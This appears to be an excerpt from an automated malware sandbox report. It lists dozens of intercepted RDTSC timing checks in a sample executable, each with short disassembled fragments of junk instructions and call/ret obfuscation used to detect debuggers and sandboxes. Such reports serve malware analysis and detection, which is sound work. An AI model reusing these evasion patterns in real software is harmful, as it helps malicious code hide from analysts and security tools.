                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9675C2 second address: 9675F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A74Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FE5B8F4A74Ah 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 jmp 00007FE5B8F4A74Dh 0x0000001d pop esi 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9675F6 second address: 96761A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE5B8D9CB5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE5B8D9CB5Ch 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96761A second address: 967620 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 967620 second address: 967626 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 967A18 second address: 967A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 967AF7 second address: 967B02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 967D3C second address: 967D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 968230 second address: 968234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 968234 second address: 968242 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 968242 second address: 968246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 968246 second address: 96824A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96824A second address: 968257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 968825 second address: 968884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnl 00007FE5B8F4A762h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FE5B8F4A748h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov esi, edi 0x0000002b xchg eax, ebx 0x0000002c jmp 00007FE5B8F4A74Dh 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 pushad 0x00000036 popad 0x00000037 pop eax 0x00000038 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 968D25 second address: 968D30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FE5B8D9CB56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 968D30 second address: 968DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007FE5B8F4A74Bh 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FE5B8F4A748h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 00000000h 0x0000002d jp 00007FE5B8F4A751h 0x00000033 pushad 0x00000034 jo 00007FE5B8F4A749h 0x0000003a movzx eax, dx 0x0000003d jbe 00007FE5B8F4A74Ch 0x00000043 mov dword ptr [ebp+122D1EB1h], edx 0x00000049 popad 0x0000004a xchg eax, ebx 0x0000004b jmp 00007FE5B8F4A756h 0x00000050 push eax 0x00000051 js 00007FE5B8F4A759h 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a pop eax 0x0000005b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 969765 second address: 96976A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96A961 second address: 96A97C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A757h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96AA35 second address: 96AA3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96AA3B second address: 96AA41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96AA41 second address: 96AA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96C912 second address: 96C98C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jc 00007FE5B8F4A746h 0x0000000d pop ebx 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 jmp 00007FE5B8F4A757h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FE5B8F4A748h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007FE5B8F4A748h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000017h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f mov edi, dword ptr [ebp+122D2991h] 0x00000055 push eax 0x00000056 push ecx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96C98C second address: 96C990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9708B2 second address: 9708B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 971823 second address: 971828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 970AE4 second address: 970AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 973EE9 second address: 973EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9719E5 second address: 971A07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A756h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 973EED second address: 973EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 971A07 second address: 971A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 973EF3 second address: 973F0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8D9CB67h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 971A0B second address: 971A11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 974EBC second address: 974EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9750A4 second address: 9750B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE5B8F4A74Bh 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97761D second address: 977643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnp 00007FE5B8D9CB5Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FE5B8D9CB5Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9783F1 second address: 978435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 nop 0x00000007 cmc 0x00000008 push 00000000h 0x0000000a mov ebx, dword ptr [ebp+122D191Eh] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FE5B8F4A748h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c mov bl, ah 0x0000002e pushad 0x0000002f mov cl, B2h 0x00000031 add ecx, 2B60350Ah 0x00000037 popad 0x00000038 push eax 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c jnp 00007FE5B8F4A746h 0x00000042 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 977643 second address: 977648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97A314 second address: 97A32B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jne 00007FE5B8F4A746h 0x00000013 popad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97A531 second address: 97A536 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97C4A3 second address: 97C530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE5B8F4A756h 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c jmp 00007FE5B8F4A74Ah 0x00000011 nop 0x00000012 or dword ptr [ebp+122DB6D9h], edi 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007FE5B8F4A748h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 jne 00007FE5B8F4A749h 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edi 0x0000003f call 00007FE5B8F4A748h 0x00000044 pop edi 0x00000045 mov dword ptr [esp+04h], edi 0x00000049 add dword ptr [esp+04h], 0000001Dh 0x00000051 inc edi 0x00000052 push edi 0x00000053 ret 0x00000054 pop edi 0x00000055 ret 0x00000056 adc bx, AF41h 0x0000005b xchg eax, esi 0x0000005c push edi 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97C530 second address: 97C543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE5B8D9CB56h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop ecx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97A5E7 second address: 97A605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE5B8F4A757h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97A605 second address: 97A613 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop edi 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97D486 second address: 97D48B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97D48B second address: 97D499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97B553 second address: 97B5E4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE5B8F4A751h 0x0000000b popad 0x0000000c nop 0x0000000d or ebx, dword ptr [ebp+122D343Bh] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a jnp 00007FE5B8F4A765h 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 mov dword ptr [ebp+122D2C4Ah], edx 0x0000002d mov eax, dword ptr [ebp+122D0CA1h] 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007FE5B8F4A748h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 00000015h 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d mov di, 8C4Fh 0x00000051 push FFFFFFFFh 0x00000053 sbb bx, A846h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d js 00007FE5B8F4A746h 0x00000063 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97D499 second address: 97D49D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97B5E4 second address: 97B5F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A74Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97D49D second address: 97D4A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97B5F3 second address: 97B5FD instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE5B8F4A74Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97D4A3 second address: 97D4AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97E364 second address: 97E3B7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE5B8F4A748h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push edi 0x00000010 pushad 0x00000011 movzx ebx, dx 0x00000014 mov edx, ebx 0x00000016 popad 0x00000017 pop ebx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007FE5B8F4A748h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 jns 00007FE5B8F4A74Ch 0x0000003a push 00000000h 0x0000003c xor ebx, dword ptr [ebp+122D2885h] 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 push edi 0x00000046 pushad 0x00000047 popad 0x00000048 pop edi 0x00000049 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97E3B7 second address: 97E3DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FE5B8D9CB56h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 97E3DB second address: 97E3DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 98043A second address: 980444 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE5B8D9CB5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BAAD1 second address: 9BAAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BAAD7 second address: 9BAAE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8D9CB5Bh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BAAE6 second address: 9BAB0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A752h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnc 00007FE5B8F4A746h 0x00000012 jl 00007FE5B8F4A746h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BAC29 second address: 9BAC2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BAC2D second address: 9BAC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BAC33 second address: 9BAC3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BAEF4 second address: 9BAEFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BAEFA second address: 9BAF05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BAF05 second address: 9BAF0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BB1F0 second address: 9BB1F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BB1F5 second address: 9BB1FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BB1FB second address: 9BB1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 966CBF second address: 966CC9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 966CC9 second address: 966CDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FE5B8D9CB56h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BB4A5 second address: 9BB4AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BB4AB second address: 9BB4BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE5B8D9CB5Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BF9A3 second address: 9BF9BC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FE5B8F4A74Fh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9BFB23 second address: 9BFB27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9C3221 second address: 9C3225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9C3225 second address: 9C323C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE5B8D9CB5Dh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9C2C24 second address: 9C2C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9CA669 second address: 9CA66E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9CAA8C second address: 9CAAC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE5B8F4A74Ah 0x00000009 popad 0x0000000a jmp 00007FE5B8F4A757h 0x0000000f jl 00007FE5B8F4A74Ch 0x00000015 jg 00007FE5B8F4A746h 0x0000001b popad 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9CAD74 second address: 9CAD78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9CB5A6 second address: 9CB5B3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
